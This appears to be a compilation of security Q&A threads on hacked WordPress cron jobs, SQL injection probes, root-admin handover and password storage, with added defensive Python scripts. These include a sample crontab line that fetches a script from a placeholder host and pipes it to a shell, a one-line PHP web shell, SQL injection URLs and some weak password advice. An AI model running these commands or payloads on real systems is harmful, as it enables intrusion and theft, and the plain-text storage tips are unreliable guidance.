How can I search for malicious cron jobs? - cron

I have an account at WebFaction, and multiple sites that have been hacked, now multiple times, over the past month. Most of these are WordPress installs.
Every time this happens I change all passwords -- user, site access, databases, etc. -- update WordPress, and look for cron jobs in the WordPress installs.
I'm pretty confident that I know how to change a password (and generate secure passwords). If there's a gap in my (low level of) knowledge, it's cron jobs and whether or not I might be missing something in working through all of this in terms of a "back door" being left open.
Is there an automated way I can search for these? If I have to manually open every single one of these hundreds and hundreds of compromised PHP files, is there a certain text string or something I can search for that will help me find (and understand) what these are?

If you've been hacked there are only two secure ways: reinstall completely from known-good installation sources, or restore a backup that you know for sure was taken before the intrusion.
Once an attacker has gained access to a system, there are so many ways to hide malicious code that it is impossible to go through it all and be sure nothing is left.
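The answer above is the right one (rebuild from known-good sources), but the asker still wants to know what to look for while triaging. The script below, added here as an illustration and not code from the original post, enumerates the usual cron locations and flags crontab lines and PHP files that carry constructs typical of planted back doors (download-and-pipe-to-shell, decoded payloads, `eval(base64_decode(...))`). The indicator lists, the cron paths and the sample crontab/PHP strings are my own constructed assumptions; a hit is a starting point for a human look, not proof of compromise, and a clean scan never proves the opposite.

```python
"""Triage helper: enumerate cron entries and flag PHP files with constructs
typical of web-shell back doors.  Example code added here, not from the
original post; indicator lists and sample inputs are constructed assumptions."""
import os
import re

# Cron-line indicators: fetch-and-execute pipelines, encoded payloads,
# executables run from world-writable scratch directories, inline PHP.
CRON_INDICATORS = [
    r"(curl|wget)[^|]*\|\s*(ba)?sh\b",     # download something and pipe it to a shell
    r"base64\s+(-d|--decode)",             # decode an embedded payload at run time
    r"/(tmp|dev/shm|var/tmp)/",            # scripts living in scratch space
    r"php\s+-r\s",                         # inline PHP handed to the interpreter
]

# PHP indicators: runtime evaluation of decoded or obfuscated input.
PHP_INDICATORS = [
    r"eval\s*\(",
    r"base64_decode\s*\(",
    r"gzinflate\s*\(|str_rot13\s*\(",
    r"(system|shell_exec|passthru|exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)",
    r"preg_replace\s*\([^)]*/e['\"]",      # deprecated /e modifier evaluates the replacement
]


def scan_cron_text(text):
    """Return (line_number, line) for non-comment crontab lines matching an indicator."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if any(re.search(p, line) for p in CRON_INDICATORS):
            hits.append((n, line))
    return hits


def scan_php_source(src):
    """Return the indicator patterns present in one PHP file's source."""
    return [p for p in PHP_INDICATORS if re.search(p, src)]


def scan_php_tree(root):
    """Walk a directory tree; return {path: [indicators]} for suspicious PHP files."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings


def collect_cron_sources():
    """Cron files on a typical Linux host (assumed layout; unreadable dirs are skipped)."""
    paths = ["/etc/crontab"]
    for d in ("/etc/cron.d", "/var/spool/cron", "/var/spool/cron/crontabs"):
        try:
            paths += [os.path.join(d, f) for f in os.listdir(d)]
        except OSError:
            continue
    return [p for p in paths if os.path.isfile(p)]


# Constructed samples (not from the page) so the helpers can be exercised offline.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * wget -q -O - http://PLACEHOLDER-HOST/x.sh | sh
"""
SAMPLE_PHP_CLEAN = "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>"
SAMPLE_PHP_SHELL = "<?php eval(base64_decode($_POST['p'])); ?>"

if __name__ == "__main__":
    print("sample cron hits:", scan_cron_text(SAMPLE_CRONTAB))
    for src in collect_cron_sources():
        with open(src, encoding="utf-8", errors="replace") as fh:
            for n, line in scan_cron_text(fh.read()):
                print(f"{src}:{n}: {line}")
    for path, hits in scan_php_tree("/var/www").items():
        print(path, hits)
```

Run it as the account that owns the sites (or as root to see every user's crontab); every flagged file is then compared against a fresh copy of the same plugin or theme from the vendor, which is the only way to tell a legitimate use of `base64_decode` from a planted one.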


Is sharing your C:/Users name a security risk?

I wanted to show someone a video of my Python code working, but in this video I need to show my folders, C:\Users\etc\etc. Is giving away the Users bit a risk (obviously it's my Windows name in place of 'users')? I often see tutorials blocking this name.
Short answer: yes, it is a security risk; you are telling someone the username for your system. However, the better question is whether you should go to the effort of hiding it based on the security risk.
Unfortunately this question is much harder to answer with a simple yes/no and depends a lot on your personal (and your organisation's) attitude to risk.
If someone is trying to hack into your system, having valid credentials for the system is obviously a good way to go, hence the amount of effort that goes into phishing-style e-mails, websites etc. By showing your username you have given the attacker half the things they need (assuming no MFA etc.).
That being said, usernames are often very easy to guess. Built-in accounts, e.g. Administrator in Windows and root in Linux, have been targets in the past, although they are better protected from network logins these days. In corporate environments, usernames are often e-mail addresses or the user part of the address (the bit before the @ symbol).
As well as considering how available your username already is in the public domain, you need to consider where the video is going to be shared. For example, if you are in a corporate environment where usernames are firstname.lastname and this video is only going to be shared on the company intranet, well, quite honestly, anyone with access to the video can guess your username.
Based on the hints above you can make up your mind about whether or not you need to hide your username. Let's look at this from another angle: how hard is it to hide the username? Assuming that your demonstration works just as well from any directory on your computer, why not put everything you need in C:\temp? Then there is no need to show a path with your username in it.
In summary, the choice is yours and I hope this gives you a guide to how to consider the risks and make an informed choice. Personally (sorry SO rule followers, I will give a quick opinion here) I would avoid showing it, as generally it is easy to build a video from a temp directory rather than one off C:\Users\<username>; equally, when using a Linux system I don't lose any sleep over the fact that the prompt shows my username.

One of our users visited different URLs in my website

I have an affiliate website. I am monitoring which URLs users are visiting. For the first time I have noticed a user visiting the following URLs on my website, which I guess is some kind of hacking attempt. I need help. My website is constantly performing poorly. Sometimes it takes longer than normal to open. Sometimes tables appear blank. Sometimes cron jobs fail to execute.
Following are a few of the URLs visited by a user repeatedly:
http://www.example.com/product.php?category=study-materials&id=SHOEMHMZH8HPAX4H%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x
http://www.example.com/product.php?category=video-albums&id=SHOEMHMZH8HPAX4H%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1
There are lots more such URLs. I am totally confused and a bit scared too. What is it exactly, and what is the user trying to do with such URLs? How can I prevent such actions?
Since this morning the user has been visiting from different IP addresses, and his or her visited URLs look the same as the ones I have mentioned.
It's someone trying to break into the site, probably by using a tool of some kind. This happens all the time to every website, since anyone can go off and download tools freely to attack sites.
The URLs you list have attempts to send commands to your database, called SQL Injection. If you look in your web server logs, you'll probably see this kind of thing a lot.
As long as your site has been coded securely, doesn't trust user input, doesn't use vulnerable software (such as out of date plugins or un-patched operating systems) then it may be nothing to worry about.
I presume you didn't write the software. You could always contact the creator to ask how it was coded and tested, and whether it has been pentested (which is when a professional hacker has been paid to try to break into the site).
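To make the answer concrete, here is a small script, added as an illustration and not part of the original answer, that percent-decodes the two URLs quoted in the question, flags the SQL-injection indicators in the `id` parameter, turns the `CHAR(...)` calls back into readable text so you can see the marker string the scanner is looking for in the response, and then contrasts the vulnerable pattern (the id pasted into the SQL text) with the hardened one (the id bound as a parameter). The indicator list and the `products` table are constructed; the live contrast uses SQLite with a plain tautology payload because `name_const()` is MySQL-specific, so the page's exact payload would not run against SQLite.

```python
"""Decode the query strings quoted in the question, flag SQL-injection
indicators, and contrast a string-built query with a parameterised one.
Example code added here, not from the original answer; the indicator list,
the products table and the tautology payload are constructed."""
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

# The two URLs quoted in the question.
SAMPLE_URLS = [
    "http://www.example.com/product.php?category=study-materials&id=SHOEMHMZH8HPAX4H%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x",
    "http://www.example.com/product.php?category=video-albums&id=SHOEMHMZH8HPAX4H%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1",
]

# Substrings that have no business inside a product id (assumed indicator list).
SQLI_INDICATORS = ["name_const(", "select*from", " select ", " or ", " and ",
                   "--", "char(", "' or '", '" or "']


def decoded_params(url):
    """Percent-decode every query parameter into {name: value}."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def sqli_indicators(value):
    """Return the indicators present in one decoded parameter value."""
    low = value.lower()
    return [ind for ind in SQLI_INDICATORS if ind in low]


def decode_char_calls(value):
    """Rewrite MySQL CHAR(111,108,...) sequences as the text they encode."""
    return re.sub(
        r"CHAR\(([\d,]+)\)",
        lambda m: "'" + "".join(chr(int(c)) for c in m.group(1).split(",")) + "'",
        value,
        flags=re.IGNORECASE,
    )


def build_db():
    """Constructed in-memory products table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [("SHOEMHMZH8HPAX4H", "Algebra study pack"),
                      ("VID0001", "Concert album")])
    return conn


def lookup_unsafe(conn, product_id):
    """Vulnerable pattern: user input is concatenated into the SQL text."""
    sql = f"SELECT name FROM products WHERE id = '{product_id}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, product_id):
    """Hardened pattern: the id travels as a bound parameter, never as SQL."""
    return [row[0] for row in
            conn.execute("SELECT name FROM products WHERE id = ?", (product_id,))]


# Constructed tautology payload for the SQLite contrast (see lead-in).
TAUTOLOGY = "x' OR '1'='1"

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        params = decoded_params(url)
        print("id  :", decode_char_calls(params["id"]))
        print("hits:", sqli_indicators(params["id"]))
    conn = build_db()
    print("unsafe:", lookup_unsafe(conn, TAUTOLOGY))   # every row leaks
    print("safe  :", lookup_safe(conn, TAUTOLOGY))     # nothing matches
```

The same `sqli_indicators` check can be run over the decoded request URIs in the web server access log to see how often this is happening; the fix, however, is not filtering but making every query in the application look like `lookup_safe`.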

Files from domain are automatically deleted

Files get automatically deleted from hosting account.
How do I go about finding out whether it's a virus on the hosting or whether someone with malicious intentions has hacked our hosting?
How do I go about finding the cause of this situation?
Thanks
Your question is far too general... basically this is a job for a forensic/security analyst... who would in turn need administrative (and usually physical) access to the machine...
What you can do:
Check whether there are any accounts that don't belong there
Check for background processes like cron/scheduler etc.
Check for viruses/rootkits etc.
This might yield nothing since for a real check you need to boot from a medium which is 100% virus-free
Change ALL passwords to new and very secure ones
Check all logs

Designing a Linux-based system for transferability of ownership/admin rights without total trust

Inspired by a much more specific question on ServerFault.
We all have to trust a huge number of people for the security and integrity of the systems we use every day. Here I'm thinking of all the authors of all the code running on your server or PC, and everyone involved in designing and building the hardware. This is mitigated by reputation and, where source is available, peer review.
Someone else you might have to trust, who is mentioned far less often, is the person who previously had root on a system. Your predecessor as system administrator at work. Or for home users, that nice Linux-savvy friend who configured your system for you. The previous owner of your phone (can you really trust the Factory Reset button?)
You have to trust them because there are so many ways to retain root despite the incoming admin's best efforts, and those are only the ones I could think of in a few minutes. Anyone who has ever had root on a system could have left all kinds of crazy backdoors, and your only real recourse under any Linux-based system I've seen is to reinstall your OS and all code that could ever run with any kind of privilege. Say, mount /home with noexec and reinstall everything else. Even that's not sufficient if any user whose data remains may ever gain privilege or influence a privileged user in sufficient detail (think shell aliases and other malicious configuration). Persistence of privilege is not a new problem.
How would you design a Linux-based system on which the highest level of privileged access can provably be revoked without a total reinstall? Alternatively, what system like that already exists? Alternatively, why is the creation of such a system logically impossible?
When I say Linux-based, I mean something that can run as much software that runs on Linux today as possible, with as few modifications to that software as possible. Physical access has traditionally meant game over because of things like keyloggers which can transmit, but suppose the hardware is sufficiently inspectable / tamper-evident to make ongoing access by that route sufficiently difficult, just because I (and the users of SO?) find the software aspects of this problem more interesting. :-) You might also assume the existence of a BIOS that can be provably reflashed known-good, or which can't be flashed at all.
I'm aware of the very basics of SELinux, and I don't think it's much help here, but I've never actually used it: feel free to explain how I'm wrong.
First and foremost, you did say design :) My answer will contain references to stuff that you can use right now, but some of it is not yet stable enough for production. My answer will also contain allusions to stuff that would need to be written.
You can not accomplish this unless you (as user9876 pointed out) fully and completely trust the individual or company that did the initial installation. If you can't trust this, your problem is infinitely recursive.
I was very active in a new file system several years ago called ext3cow, a copy on write version of ext3. Snapshots were cheap and 100% immutable, the port from Linux 2.4 to 2.6 broke and abandoned the ability to modify or delete files in the past.
Pound for pound, it was as efficient as ext3. Sure, that's nothing to write home about, but ext3 was (and for a large part still is) the production standard FS.
Using that type of file system, assuming a snapshot was made of the pristine installation after all services had been installed and configured, it would be quite easy to diff an entire volume to see what changed and when.
At this point, after going through the diff, you can decide that nothing is interesting and just change the root password, or you can go inspect things that seem a little odd.
Now, for the stuff that has to be written if something interesting is found:
Something that you can pipe the diff through that investigates each file. What you're going to see is a list of revisions per file, at which time they would have to be recursively compared, i.e., present against former-present, former-present against past1, past1 against past2, etc., until you reach the original file or the point that it no longer exists. Doing this by hand would seriously suck. Also, you need to identify files that were never versioned to begin with.
Something to inspect your currently running kernel. If someone has tainted VFS, none of this is going to work, CoW file systems use temporal inodes to access files in the past. I know a lot of enterprise customers who modify the kernel quite a bit, up to and including modules, VMM and VFS. This may not be such an easy task - comparing against 'pristine' may not be tenable since the old admin may have made good modifications to the kernel since it was installed.
Databases are a special headache, since they typically change every second or more, including the user table. That's going to need to be checked manually, unless you come up with something that can check to be sure that nothing is strange; such a tool would be very specific to your setup. Classic UNIX 'root' is not your only concern here.
Now, consider the other computers on the network. How many of them are running an OS that is known to be easily exploited and bot infested? Even if your server is clean, what if this guy joins #foo on IRC and starts an attack on your servers via your own LAN? Most people will click links that a co-worker sends, especially if it's a juicy blog entry about the company... social engineering is very easy if you're doing it from the inside.
In short, what you suggest is tenable; however, I'm dubious that most companies could enforce the best practices needed for it to work when needed. If the end result is that you find a BOFH in your work force and need to can him, you had better have contained him throughout his employment.
I'll update this answer more as I continue to think about it. It's a very interesting topic. What I've posted so far are my own collected thoughts on the same.
Edit:
Yes, I know about virtual machines and checkpointing, a solution assuming that brings on a whole new level of recursion. Did the (now departed) admin have direct root access to the privileged domain or storage server? Probably, yes, which is why I'm not considering it for the purposes of this question.
Look at Trusted Computing. The general idea is that the BIOS loads the bootloader, then hashes it and sends that hash to a special chip. The bootloader then hashes the OS kernel, which in turn hashes all the kernel-mode drivers. You can then ask the chip whether all the hashes were as expected.
Assuming you trust the person who originally installed and configured the system, this would enable you to prove that your OS hasn't had a rootkit installed by any of the later sysadmins. You could then manually run a hash over all the files on the system (since there is no rootkit the values will be accurate) and compare these against a list provided by the original installer. Any changed files will have to be checked carefully (e.g. /etc/passwd will have changed due to new users being legitimately added).
I have no idea how you'd handle patching such a system without breaking the chain of trust.
Also, note that your old sysadmin should be assumed to know any password typed into that system by any user, and to have unencrypted copies of any private key used on that system by any user. So it's time to change all your passwords.
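Both answers end at the same practical step: the ext3cow answer diffs a pristine snapshot against the current volume, and the Trusted Computing answer hashes every file and compares against the installer's list, with changed files (such as /etc/passwd) reviewed by hand. The script below, added here as an illustration and not code from either answer, is that step in its simplest form: build a manifest of SHA-256 hashes over a tree, save it, and later report what was added, removed or changed. The manifest format and the demo tree are my own assumptions; as the second answer notes, the hashes are only trustworthy if the kernel doing the reading is, so this runs from known-good media, not from the system under review.

```python
"""File-integrity manifest: hash a tree, compare against a baseline, report
what was added, removed or changed.  Example code added here, not from the
original answers; the manifest format and the demo tree are assumptions."""
import hashlib
import json
import os
import tempfile


def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 so large binaries do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map every file under root (forward-slash relative path) to its SHA-256.
    Symlinks are recorded by target rather than content so a redirected link
    (e.g. /bin/sh pointed somewhere new) shows up as a change."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if os.path.islink(full):
                manifest[rel] = "symlink:" + os.readlink(full)
            elif os.path.isfile(full):
                manifest[rel] = sha256_file(full)
    return manifest


def compare_manifests(baseline, current):
    """Return the three lists an auditor then reviews by hand."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline
                          if p in current and baseline[p] != current[p]),
    }


def save_manifest(manifest, path):
    """Write the baseline; keep this copy off the host (assumed: read-only media)."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def demo_run():
    """Constructed tree: snapshot, then one legitimate edit and one planted file."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        os.makedirs(os.path.join(root, "usr", "bin"))
        with open(os.path.join(root, "etc", "passwd"), "w") as fh:
            fh.write("root:x:0:0::/root:/bin/sh\n")
        with open(os.path.join(root, "usr", "bin", "ls"), "wb") as fh:
            fh.write(b"ELF-placeholder-bytes")
        baseline = build_manifest(root)
        # Later: a user is added (expected) and a new binary appears (to be explained).
        with open(os.path.join(root, "etc", "passwd"), "a") as fh:
            fh.write("alice:x:1000:1000::/home/alice:/bin/sh\n")
        with open(os.path.join(root, "usr", "bin", "ps"), "wb") as fh:
            fh.write(b"unexpected-binary")
        return compare_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    print(demo_run())
```

In real use, `build_manifest` runs once over the fresh install (and again after each approved patch, which is the only honest answer to the patching question above), the result is stored off-box, and every later comparison is reviewed line by line: `/etc/passwd` in "changed" needs an explanation, and anything in "added" under a system binary directory needs a very good one.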

Where do you record your authentication information (urls/ips/usernames/passwords)?

I'm wondering what people use for storing their username, passwords, urls, IPs, domains, and any other login information they need to both do their job and in general life. It might also store serial numbers or similar data.
I find that I'm registering for probably 5 sites a month, paying for some piece of software, or just setting up a new hosting account or SSH access to something. By the end of the month, I've both forgotten what those sites were and what my username and/or password is (not that I use a completely different password every time). Next month when I go back, I end up using the forgot-password feature and then changing the password to something that I'll forget.
I'm also thinking it needs to be mobile, probably browser based (not a USB key or other portable media) and very secure.
I'm thinking there are maybe 2 different solutions: one for a company where everyone in the company can access it and one where it's only you.
What does everyone else use to store their authentication information?
Edit: I'm looking for something to store more than just a username and password. It needs to store IPs or domains, for example for SSH access. It also needs to have the ability to put some kind of comment or other information in because, for example, the site may be limited to 1 IP.
I use KeePass. It has versions for various platforms (KeePassX for Linux, for example) and has been quite stable for me. No lost data yet, so I haven't had to resort to my backups :)
I use PasswordMaker and its fantastic Mozilla Firefox add-on. All passwords are generated from a website URL and your username. You enter a master password which then essentially "unlocks" all your passwords, so you really only have to remember one password but can have a unique password for each website you have an account on.
PasswordMaker was also recommended by Jim McKeeth in Stack Overflow Podcast #9.
Note also that there are many other ways to integrate with PasswordMaker besides the Firefox add-on. For example, they have an online version that can be used essentially anywhere as long.
I use a certain string of characters in all my passwords, then for each new site I register on I append another string of characters which can be determined by looking at the site's name or URL. All I have to remember is the base password and the algorithm for determining the rest of the password.
Try Password Gorilla and use GetDropBox.com to keep it synced across machines. I think it was recommended by the developers of this site.
I keep everything always with me on my Treo, with SplashId. (Handles custom fields, too)
I have two different solutions:
For work-related passwords (logins to our web servers and MySQL users and logins), we use a shared Google doc. It's not ideal, but it's better than having just one password (we did when I started), and it's better than being locked out if one guy gets run over by a bus.
My private solution is a variant of Jeremy Ruten's solution: an algorithm that gives a couple of chars based on the URL/hostname and another algorithm for the second half of the password (which usually gives me two or three choices when I've forgotten the password, but that takes just a few minutes extra).
Here's a simple solution that I think fits your requirements.
Store all your usernames, passwords, URLs, IPs, whatever in a plain text file. Yes, really. You may even want to have one text file for usernames & passwords, another for URLs, another for IPs ... whatever works for you.
Alternatively, if you'll have MS Office, Open Office, Star Office, or some other compatible office program available at every site, a spreadsheet works splendidly for this type of thing.
Zip this (these) file(s) up and apply a good password.
Attach this zip file to an e-mail you keep in your favorite Web-based e-mail box. To keep it easy to find, you might want to create a separate folder, or just create a separate e-mail account just for this purpose.
That's it. Assuming you can rely on having a Web browser with access to your Web mail, an unzip utility, and a text file reader (or better yet, a spreadsheet reader), you can access your information securely from anywhere.
I use Password Safe. You can store, organize and retrieve all the essentials in a snap. It also has a handy "generate random password" that I use more and more, especially for those once-in-a-while-never-worth-remembering-the-password sites.
http://passwordsafe.sourceforge.net/
I store my passwords in text files on an encrypted partition.
Like claudiu, I use a several-tier system and my memory. I have a good handful of passwords that I know from memory, and what type of stuff I'm using determines which passwords I use. Effectively I have two or three passwords for each of my "tier" categories. Sometimes I have to try several of them if it's a site I don't use often until I get in, though typically I'm very good at remembering which ones I use on which sites.
Clipperz looks like a good solution. It allows you to store pretty much anything you want and encrypts all of your data with your password. It also includes an export feature and offline read-only version. And it's free!
Keepassc (https://github.com/raymontag/keepassc) on my Linux machines, with the database file stored within Dropbox so it can be synced with my Android phone (KeepassDroid) and Windows machines (Keepass). Works great!
Use the same password for everything. Give it out to strangers.
Just kidding. I use three tiers of passwords - the lowest one is really easy to remember, and applies to all accounts whose security I don't care about. I just use it for most things like this.
For the other stuff, I don't find it to be such sensitive information, so I'll store them in a large "info.txt" text file. I'll put a password hint next to it, such as "the bad one", or "double z" for example, if I have a password I use a lot that has two zs in it. I just use standard CTRL+F search to lookup the info.
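Several answers above (PasswordMaker, the "base password plus a site rule" schemes, the tiered memorised passwords) rely on deriving each site's password from one secret instead of storing anything. The block below, added here as an illustration and not PasswordMaker's own code or algorithm, shows the stronger form of that idea: a master secret stretched with PBKDF2-HMAC-SHA256 and salted with the normalised site hostname, the username and a rotation counter, so that losing one site's password reveals nothing about the rule behind the others and a single site can be rotated without changing the master. Alongside it is the other approach the answers mention, a random password generated to be stored in a manager such as KeePass or Password Safe. The alphabet, iteration count and length are my assumptions.

```python
"""Per-site password derivation (the strengthened form of the "master password
+ site rule" schemes in the answers above) and random generation for a manager.
Example code added here, not PasswordMaker's algorithm; parameters are assumed."""
import hashlib
import secrets
import string
from urllib.parse import urlsplit

ALPHABET = string.ascii_letters + string.digits + "!#%&*+-=?@^_"
ITERATIONS = 200_000  # assumed work factor; raise as hardware allows


def site_key(url_or_host):
    """Normalise so https://www.Example.com/login and example.com derive the same
    password: scheme and path dropped, host lower-cased, leading www. removed."""
    target = url_or_host if "://" in url_or_host else "//" + url_or_host
    host = (urlsplit(target).hostname or url_or_host).lower()
    return host[4:] if host.startswith("www.") else host


def derive_password(master, site, username="", length=20, counter=1):
    """PBKDF2-HMAC-SHA256 keyed by the master secret and salted with the site,
    username and a counter.  Bump the counter to rotate one site's password."""
    salt = f"{site_key(site)}\x00{username}\x00{counter}".encode()
    raw = hashlib.pbkdf2_hmac("sha256", master.encode(), salt, ITERATIONS,
                              dklen=length * 2)
    # Two bytes per character; the modulo bias over a 74-symbol alphabet is negligible.
    return "".join(ALPHABET[int.from_bytes(raw[2 * i:2 * i + 2], "big") % len(ALPHABET)]
                   for i in range(length))


def random_password(length=20):
    """The alternative: an unguessable password you store in a manager, not derive."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


if __name__ == "__main__":
    master = "correct horse battery staple"   # constructed sample, not a real secret
    for site in ("https://www.Example.com/login", "example.com", "ssh://host.example.org"):
        print(f"{site_key(site):20} {derive_password(master, site, 'bob')}")
    print("rotated:", derive_password(master, "example.com", "bob", counter=2))
    print("random :", random_password())
```

The trade-off the answers hint at is visible in the code: the derived scheme needs nothing stored (the asker's comment and IP fields still need a notebook of some kind), but a site that forces a password change means remembering a counter, and the master can never be changed without re-deriving every site, whereas the random-plus-manager approach handles both cases and is why the KeePass and Password Safe answers win out in practice.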